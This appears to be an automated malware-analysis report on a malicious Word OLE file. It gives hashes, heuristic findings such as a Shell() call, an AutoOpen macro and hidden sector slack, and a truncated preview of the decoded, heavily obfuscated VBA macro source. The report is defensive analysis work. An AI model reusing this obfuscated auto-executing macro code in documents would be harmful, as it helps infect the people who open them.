Office (OLE) malware analysis — malicious · dcc50c63d9a23f4a

MALICIOUS

Office (OLE)

169.5 KB Created: 2018-04-26 14:33:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: adc55e7dedd1bc636e1ffb153d71cc26 SHA-1: d970e3211922eab95e62e6e15794289c32909c8f SHA-256: dcc50c63d9a23f4aaf1aa5b81941070ab9f69262d40639ef38b90cb3f7da95aa

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OLE document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code, suggesting an attempt to execute arbitrary commands. The AutoOpen macro marker further supports the malicious intent. While the VBA code is heavily obfuscated, the Shell() call is the primary indicator of malicious activity, likely for downloading and executing a second-stage payload.

Heuristics 6

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 173,568 bytes but its declared streams total only 35,321 bytes — 138,247 bytes (80%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52793 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	52793 bytes
SHA-256: `ce1a15875c8cc653a71324b50de18f3fe93825b77dbc27dd671f962fd0ece23d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zfAnnQJJ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub UFuwFI(BwdcBR) Select Case uYTbtR Case 25512 avkpk = Hex(jjAso - ChrW(fitRDB)) iTYrF = CByte(72325) IjFNZ = iPfwOQ Case 46232 VPckMi = LiCYs ilBEi = Round(6749) AzanS = Log(IPDvCn) End Select End Sub Sub cJDwHs(SwBDo) Select Case ivdduj Case 24757 cVooR = Hex(VpIjz - ChrW(PjZiEz)) wtDwXw = CByte(73504) MmZBT = RzoPHp Case 56921 cnSEDQ = WvZwzQ YWRpf = Round(90789) DjhjK = Log(jkTzHJ) End Select Select Case QQjSv Case 40832 pqzEV = Hex(waRzR - ChrW(ibZEk)) sSLmc = CByte(53946) oFBIqw = KXTMjd Case 20101 zISVf = ajrLvv CMDOX = Round(30276) DzRbzX = Log(LHMVHN) End Select Select Case SDTGwq Case 25971 JzuDr = Hex(LQzLN - ChrW(zCqrWI)) Pbiqoh = CByte(22006) IkIbYU = nUhvfs Case 113 PJtkuQ = bjosw iHFVjX = Round(4590) pjoIPO = Log(JacGP) End Select End Sub Sub PjuzRS(IYnjWm) Select Case NbazU Case 95523 ZZFci = Hex(qSJLm - ChrW(LPaKYO)) GXRwI = CByte(73551) FJiAdl = YpGpU Case 75086 FqPct = atmRBk rnIdw = Round(80802) zhjIi = Log(QmZUU) End Select Select Case boAhB Case 39026 wDLWQ = Hex(sValhd - ChrW(imSYGG)) sWoUSw = CByte(95555) brFGJ = rzmKTJ Case 80840 qAsqcZ = VbbvaV OqEUBj = Round(89744) faTKnp = Log(NnzDOf) End Select End Sub Sub Autoopen() On Error Resume Next Select Case cbUYUF Case 29477 LiMPiv = Hex(wIGkH - ChrW(RXRlz)) OnwWHw = CByte(51002) cAcPp = BOlwY Case 12724 HoowdY = KECmU BqNME = Round(36887) hiwfr = Log(nTDlSN) End Select irAFOphEPzOG (EHzJZd + AKWOjzER + HDYzp) Select Case YSKBZt Case 9548 DdqJFi = Hex(zHSjZb - ChrW(urDma)) AiFApw = CByte(43065) JBMZI = AdIzUv Case 74662 vFNQT = YTzmS zYXqU = Round(15964) PqGFK = Log(jLQjE) End Select End Sub Sub fIsiz(YdJwpD) Select Case GzzbG Case 35197 MiXRpz = Hex(AmBHj - ChrW(UnAEqX)) viCSA = CByte(4127) ERjjJQ = Gwlbt Case 301 YrIoGK = Twslj jhjER = Round(75598) wiCRw = Log(UOqPd) End Select Select Case XSXntd Case 89127 alSqza = Hex(oYQhK - ChrW(jmpoq)) npqcjP = CByte(78543) zMuma = vtNPM Case 38769 RjqZh = qqfhz nHCjI = Round(68014) IODcii = Log(nKmZZ) End Select Select Case WSVJAD Case 3011 wVRfuj = Hex(PtJEjk - ChrW(JNDLv)) fjDGHX = CByte(62462) lsiFh = Ktmzju Case 37525 RdUtr = IHFpH RRRLXX = Round(5433) iAazw = Log(AQbGb) End Select End Sub Sub HHPam(fVMdm) Select Case zHNtba Case 48891 sBtQC = Hex(ulKsj - ChrW(NHSJCq)) JrhGA = CByte(26618) BrrHoA = QIGNzX Case 32975 uKTzn = qoEqlB TKvtC = Round(41197) DtDDf = Log(zwMvD) End Select End Sub Attribute VB_Name = "HqzXmDaAL" Sub nQDzR(zLUwCw) Select Case AGQSV Case 67490 cInStY = Hex(nIqcU - ChrW(BGnAj)) BAAbG = CByte(30870) bzQVk = RTZfc Case 70352 saKCi = hqNuT ... (truncated)

SHA-256: ce1a15875c8cc653a71324b50de18f3fe93825b77dbc27dd671f962fd0ece23d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zfAnnQJJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub UFuwFI(BwdcBR)
Select Case uYTbtR
         Case 25512
            avkpk = Hex(jjAso - ChrW(fitRDB))
            iTYrF = CByte(72325)
            IjFNZ = iPfwOQ
         Case 46232
            VPckMi = LiCYs
            ilBEi = Round(6749)
            AzanS = Log(IPDvCn)
End Select
End Sub
Sub cJDwHs(SwBDo)
Select Case ivdduj
         Case 24757
            cVooR = Hex(VpIjz - ChrW(PjZiEz))
            wtDwXw = CByte(73504)
            MmZBT = RzoPHp
         Case 56921
            cnSEDQ = WvZwzQ
            YWRpf = Round(90789)
            DjhjK = Log(jkTzHJ)
End Select
Select Case QQjSv
         Case 40832
            pqzEV = Hex(waRzR - ChrW(ibZEk))
            sSLmc = CByte(53946)
            oFBIqw = KXTMjd
         Case 20101
            zISVf = ajrLvv
            CMDOX = Round(30276)
            DzRbzX = Log(LHMVHN)
End Select
Select Case SDTGwq
         Case 25971
            JzuDr = Hex(LQzLN - ChrW(zCqrWI))
            Pbiqoh = CByte(22006)
            IkIbYU = nUhvfs
         Case 113
            PJtkuQ = bjosw
            iHFVjX = Round(4590)
            pjoIPO = Log(JacGP)
End Select
End Sub
Sub PjuzRS(IYnjWm)
Select Case NbazU
         Case 95523
            ZZFci = Hex(qSJLm - ChrW(LPaKYO))
            GXRwI = CByte(73551)
            FJiAdl = YpGpU
         Case 75086
            FqPct = atmRBk
            rnIdw = Round(80802)
            zhjIi = Log(QmZUU)
End Select
Select Case boAhB
         Case 39026
            wDLWQ = Hex(sValhd - ChrW(imSYGG))
            sWoUSw = CByte(95555)
            brFGJ = rzmKTJ
         Case 80840
            qAsqcZ = VbbvaV
            OqEUBj = Round(89744)
            faTKnp = Log(NnzDOf)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case cbUYUF
         Case 29477
            LiMPiv = Hex(wIGkH - ChrW(RXRlz))
            OnwWHw = CByte(51002)
            cAcPp = BOlwY
         Case 12724
            HoowdY = KECmU
            BqNME = Round(36887)
            hiwfr = Log(nTDlSN)
End Select
irAFOphEPzOG (EHzJZd + AKWOjzER + HDYzp)
Select Case YSKBZt
         Case 9548
            DdqJFi = Hex(zHSjZb - ChrW(urDma))
            AiFApw = CByte(43065)
            JBMZI = AdIzUv
         Case 74662
            vFNQT = YTzmS
            zYXqU = Round(15964)
            PqGFK = Log(jLQjE)
End Select
End Sub
Sub fIsiz(YdJwpD)
Select Case GzzbG
         Case 35197
            MiXRpz = Hex(AmBHj - ChrW(UnAEqX))
            viCSA = CByte(4127)
            ERjjJQ = Gwlbt
         Case 301
            YrIoGK = Twslj
            jhjER = Round(75598)
            wiCRw = Log(UOqPd)
End Select
Select Case XSXntd
         Case 89127
            alSqza = Hex(oYQhK - ChrW(jmpoq))
            npqcjP = CByte(78543)
            zMuma = vtNPM
         Case 38769
            RjqZh = qqfhz
            nHCjI = Round(68014)
            IODcii = Log(nKmZZ)
End Select
Select Case WSVJAD
         Case 3011
            wVRfuj = Hex(PtJEjk - ChrW(JNDLv))
            fjDGHX = CByte(62462)
            lsiFh = Ktmzju
         Case 37525
            RdUtr = IHFpH
            RRRLXX = Round(5433)
            iAazw = Log(AQbGb)
End Select
End Sub
Sub HHPam(fVMdm)
Select Case zHNtba
         Case 48891
            sBtQC = Hex(ulKsj - ChrW(NHSJCq))
            JrhGA = CByte(26618)
            BrrHoA = QIGNzX
         Case 32975
            uKTzn = qoEqlB
            TKvtC = Round(41197)
            DtDDf = Log(zwMvD)
End Select
End Sub

Attribute VB_Name = "HqzXmDaAL"
Sub nQDzR(zLUwCw)
Select Case AGQSV
         Case 67490
            cInStY = Hex(nIqcU - ChrW(BGnAj))
            BAAbG = CByte(30870)
            bzQVk = RTZfc
         Case 70352
            saKCi = hqNuT
    
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.